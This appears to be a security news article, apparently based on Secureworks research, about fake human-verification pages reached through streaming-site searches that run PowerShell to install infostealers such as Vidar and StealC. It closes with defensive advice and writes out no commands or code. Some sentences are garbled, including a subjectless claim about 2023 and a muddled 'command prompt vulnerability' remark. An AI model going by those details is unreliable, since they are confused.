In two separate incidents, researchers identified victims who were unwittingly redirected to malicious websites after conducting Google searches for popular video streaming services.
One victim was browsing for sports websites, while the other was searching for a movie. Both victims were subsequently lured into a fraudulent verification process that, upon completion, executed a malicious PowerShell command.
The PowerShell script extracts a malicious ZIP archive to the victim’s temporary folder. Upon extraction, the malware within the archive is executed, initiating a series of malicious actions, which include the deployment and execution of tools such as a renamed BitTorrent client and a Windows utility, further compromising the victim’s system.
The researchers also discovered that in some cases, the malware also deployed infostealers like Vidar and StealC, enabling the attackers to steal sensitive information from the compromised system.
The attack leverages a command prompt vulnerability to bypass browser security. By executing unauthorized code on the victim’s device, it poses a significant security threat.
It has been identified that there are some instances where controls previously used to mitigate similar attacks in the Middle East and Australia were also effective in preventing attacks targeting France and other regions.
These attacks, often disguised as legitimate services like GitHub, aimed to deploy malware like LummaC2 for data theft, highlighting the global nature of this campaign and the importance of sharing threat intelligence and best practices among organizations worldwide.
In 2023, warn of the rising threat posed by infostealers, malicious software designed to steal sensitive information, while in 2024, a fake human verification prompt was employed to trick victims into divulging their credentials, which were promptly sold on Russian Market, an underground marketplace known for trading illicit goods and services.
The rapid dissemination of the stolen data highlighted the urgency of addressing the growing threat of infostealers and the need for robust security measures to protect against such attacks.
Secureworks recommends organizations implement strict policies to prevent employees from accessing streaming services and risky content on corporate systems. Regular social engineering training that incorporates up-to-date threat intelligence on the latest techniques is crucial to educating employees about potential risks and scams.
Additionally, implementing web proxies to limit access to potentially malicious web pages can significantly mitigate the threat of unauthorized access and data breaches. By combining these strategies, organizations can create a more secure and compliant digital environment.
They advise customers to use security controls to limit access to malicious URLs, which may contain malicious content. To mitigate exposure to malware, users should carefully review and restrict access to these URLs before opening them in a web browser.
